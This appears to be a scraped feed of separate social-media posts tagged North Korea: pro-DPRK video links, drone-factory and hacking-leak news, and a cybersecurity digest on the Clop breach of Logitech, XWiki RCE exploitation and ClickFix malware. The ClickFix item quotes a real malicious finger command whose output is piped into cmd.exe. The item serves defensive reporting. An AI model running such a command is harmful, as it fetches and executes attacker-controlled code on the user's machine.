City of Samjiyon, the Prelude to Regional Development Opened [English]

https://tankie.tube/videos/watch/6e82f3d9-631a-4bb9-8f8f-cd087a58bd8b

Resources to Learn More About the DPRK (aka North Korea)

https://docs.google.com/document/d/1fPJjTYGBo4QRuafFkbWTA8imbpr-QP3tD_946Yv_v3A/edit?tab=t.0

#DPRK #NorthKorea #Korea #USA #US #Imperialism

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/logitech-confirms-data-breach-after-clop-extortion-attack/

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | https://thehackernews.com/2025/11/rondodox-exploits-unpatched-xwiki.html

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger vke@finger.cloudmega[.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | https://thehackernews.com/2025/11/five-us-citizens-plead-guilty-to.html

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement

Our Strength Is The Best [English]

https://tankie.tube/videos/watch/8f70c356-3220-48be-9e21-6ddfc1a5f7e2

Russia to import 12,000 North Koreans to work in massive Shahed drone plant

#Russia running out of workers to build #Shahed-type deep-strike #drones, & Ukraine’s military intelligence (HUR) says they’re calling on #NorthKorea for help

New workers are bound for Russia’s #Alabuga factory in #Tatarstan, which produces the bulk of its domestic versions of the #Iranian-designed Shahed drones, also called “Gerans” and “Gerberas.”

https://kyivindependent.com/russia-plans-to-import-12-000-north-koreans-to-work-in-its-massive-shahed-drone-plant/

#RussianDrones #factory #factories #Ukraine

A Major Leak Spills a Chinese Hacking Contractor’s Tools and Targets

https://fed.brid.gy/r/https://www.wired.com/story/major-leak-spills-chinese-hacking-contractor-tools-targets/

DOJ: 5 guilty pleas tied to North Korea’s IT worker scheme. 136 U.S. companies hit, $2.2M earned, and $15M in stolen crypto seized from APT38/Lazarus operations.

#CyberSecurity #NorthKorea #APT38 #DOJ #ThreatIntel #CryptoCrime